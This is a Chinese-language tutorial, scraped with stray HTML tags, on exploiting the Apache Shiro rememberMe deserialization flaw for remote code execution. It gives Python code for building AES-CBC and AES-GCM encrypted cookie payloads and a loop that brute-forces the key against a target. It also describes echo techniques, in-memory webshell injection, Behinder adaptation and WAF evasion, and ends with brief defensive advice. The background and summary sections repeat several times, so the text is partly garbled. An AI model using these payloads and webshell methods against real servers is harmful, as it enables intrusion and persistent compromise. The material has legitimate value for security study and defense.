Apache Shiro 反序列化漏洞深入分析与利用<\/h1>

0x00 背景<\/h2>
Apache Shiro 反序列化 RCE 漏洞是实战中高频出现的漏洞类型。Shiro 框架在 Java Web 登录认证中广泛应用，其 payload 本身是加密的，无攻击特征，几乎不会被 WAF 检测和拦截。<\/p>

0x01 Shiro 反序列化原理<\/h2>

漏洞核心流程<\/h3>

Shiro 处理 cookie 的关键代码：先 decrypt 再反序列化<\/li>
解密方法使用硬编码的 DEFAULT key（1.2.4 版本）<\/li>

CipherService 接口的唯一实现类是 JcaCipherService<\/li> <\/ol>

CBC 加密模式分析<\/h3>

IV 是 ciphertext 的前 16 个字节<\/li>
只要知道 key 即可构造反序列化 payload<\/li>

1.4.2 之前很多 Shiro 可以通过遍历高频 key 攻击<\/li> <\/ul>

CBC 模式 payload 生成关键代码<\/h3>

BS =<\/span> AES.<\/span>block_size
<\/span><\/span>pad =<\/span> lambda<\/span> s: s +<\/span> ((BS -<\/span> len(s) %<\/span> BS) *<\/span> chr(BS -<\/span> len(s) %<\/span> BS)).<\/span>encode()
<\/span><\/span>mode =<\/span> AES.<\/span>MODE_CBC
<\/span><\/span>iv =<\/span> uuid.<\/span>uuid4().<\/span>bytes
<\/span><\/span>file_body =<\/span> pad(file_body)
<\/span><\/span>encryptor =<\/span> AES.<\/span>new(base64.<\/span>b64decode(key), mode, iv)
<\/span><\/span>base64_ciphertext =<\/span> base64.<\/span>b64encode(iv +<\/span> encryptor.<\/span>encrypt(file_body))
<\/span><\/span>return<\/span> base64_ciphertext
<\/span><\/span><\/code><\/pre>0x02 高版本利用 (1.4.2+)<\/h2>
GCM 加密模式变化<\/h3>

由于 padding oracle 影响，官方将加密方式改为 GCM<\/li>
GCM 加密不需要 padding，但需要 MAC 值（tag）<\/li>
<\/ul>
GCM 模式 payload 生成关键代码<\/h3>
iv =<\/span> os.<\/span>urandom(16<\/span>)
<\/span><\/span>cipher =<\/span> AES.<\/span>new(base64.<\/span>b64decode(key), AES.<\/span>MODE_GCM, iv)          
<\/span><\/span>ciphertext, tag =<\/span> cipher.<\/span>encrypt_and_digest(file_body) 
<\/span><\/span>ciphertext =<\/span> ciphertext +<\/span> tag   
<\/span><\/span>base64_ciphertext =<\/span> base64.<\/span>b64encode(iv +<\/span> ciphertext)
<\/span><\/span>return<\/span> base64_ciphertext
<\/span><\/span><\/code><\/pre>0x03 攻击进阶技术<\/h2>
1. Key 检测技术<\/h3>
传统方法<\/strong>：使用 ysoserial 的 URLDNS 模块（依赖出网）<\/p>
改进方法<\/strong>：使用空的 SimplePrincipalCollection 作为序列化对象<\/p>

正确 key：响应包不会返回 rememberMe=deleteMe<\/li>
错误 key：会返回 rememberMe=deleteMe<\/li>
<\/ul>
检测代码逻辑<\/strong>：<\/p>
r1 =<\/span> requests.<\/span>get(target, cookies=<\/span>{'rememberMe'<\/span>: "123"<\/span>}, ...<\/span>)
<\/span><\/span>rsp1 =<\/span> len(str(r1.<\/span>headers))
<\/span><\/span>
<\/span><\/span>for<\/span> key in<\/span> keys:
<\/span><\/span>    payload =<\/span> generate_payload(key, checkdata)
<\/span><\/span>    r =<\/span> requests.<\/span>get(target, cookies=<\/span>{'rememberMe'<\/span>: payload}, ...<\/span>)
<\/span><\/span>    rsp =<\/span> len(str(r.<\/span>headers))
<\/span><\/span>    if<\/span> rsp1 !=<\/span> rsp and<\/span> r.<\/span>status_code !=<\/span> 400<\/span>:
<\/span><\/span>        print("!! Get key: <\/span>{0}<\/span>"<\/span>.<\/span>format(key))
<\/span><\/span>        exit()
<\/span><\/span><\/code><\/pre>2. 回显技术演进<\/h3>

Linux 下半回显<\/li>
kingkk 的 Tomcat 通用半回显<\/li>
c0ny1 的半自动化挖掘<\/li>
fnmsd 的通用回显<\/li>
<\/ol>
fnmsd 通用回显原理<\/strong>：<\/p>

在当前线程对象中搜索 request 对象<\/li>
判断请求头中是否存在指定请求头<\/li>
从 response 对象获取输出<\/li>
<\/ul>
注意点<\/strong>：<\/p>

默认搜索深度 52 层可能不够（可改为 100 层）<\/li>
长 payload 可能超过 Tomcat header 限制长度<\/li>
Nginx 下需要分段注入等替代方案<\/li>
<\/ul>
3. 内存 WebShell 技术<\/h3>
技术路线<\/strong>：<\/p>

注册 Filter（主流方案）<\/li>
注册 Controller（观星师傅方案）<\/li>
<\/ol>
threedr3am 方案<\/strong>：<\/p>

基于 Tomcat 的内存 WebShell<\/li>
通杀 Tomcat（除 Tomcat6）<\/li>
存在 payload 过长问题<\/li>
<\/ul>
涙涙笑改进方案<\/strong>：<\/p>

Cookie 中只插入自定义 ClassLoader<\/li>
ClassLoader 反射调用 defineClass<\/li>
实际 payload 通过 POST 传递<\/li>
解决了长度限制问题<\/li>
<\/ul>
内存 WebShell 关键点<\/strong>：<\/p>

编译后的 byte 放在 static 代码块中<\/li>
POST 传递 classData 必须 URL 编码<\/li>
可配合 reGeorg 实现代理<\/li>
<\/ol>
4. 内存 WebShell 适配冰蝎<\/h3>
挑战<\/strong>：冰蝎依赖的 pageContext 类在 SpringBoot 中不存在<\/p>
解决方案<\/strong>：<\/p>

修改冰蝎服务端代码（不通用）<\/li>
注入 pageContext 类 + 内存 WebShell<\/li>
<\/ol>
0x04 防御建议<\/h2>

升级到最新版 Shiro<\/li>
使用随机生成的加密 key<\/li>
禁用 rememberMe 功能（如不需要）<\/li>
实施严格的输入过滤<\/li>
监控异常 rememberMe cookie<\/li>
<\/ol>
工具与资源<\/h2>

ysoserial 修改版（支持短 payload）<\/li>
高频 key 字典<\/li>
自动化检测与利用脚本<\/li>
内存 WebShell 生成工具<\/li>
<\/ol>
总结<\/h2>
Shiro 反序列化漏洞利用技术经历了从简单到复杂的发展过程，攻击者已掌握多种绕过限制和实现高级利用的技术。防御方需要采取多层次防护措施，并及时跟进最新的安全补丁和防护方案。<\/p>

Apache Shiro 反序列化漏洞深入分析与利用<\/h1>

0x00 背景<\/h2> Apache Shiro 反序列化 RCE 漏洞是实战中高频出现的漏洞类型。Shiro 框架在 Java Web 登录认证中广泛应用，其 payload 本身是加密的，无攻击特征，几乎不会被 WAF 检测和拦截。<\/p>

0x01 Shiro 反序列化原理<\/h2>

0x02 高版本利用 (1.4.2+)<\/h2>

0x03 攻击进阶技术<\/h2>

总结<\/h2> Shiro 反序列化漏洞利用技术经历了从简单到复杂的发展过程，攻击者已掌握多种绕过限制和实现高级利用的技术。防御方需要采取多层次防护措施，并及时跟进最新的安全补丁和防护方案。<\/p>

0x00 背景<\/h2>
Apache Shiro 反序列化 RCE 漏洞是实战中高频出现的漏洞类型。Shiro 框架在 Java Web 登录认证中广泛应用，其 payload 本身是加密的，无攻击特征，几乎不会被 WAF 检测和拦截。<\/p>

总结<\/h2>
Shiro 反序列化漏洞利用技术经历了从简单到复杂的发展过程，攻击者已掌握多种绕过限制和实现高级利用的技术。防御方需要采取多层次防护措施，并及时跟进最新的安全补丁和防护方案。<\/p>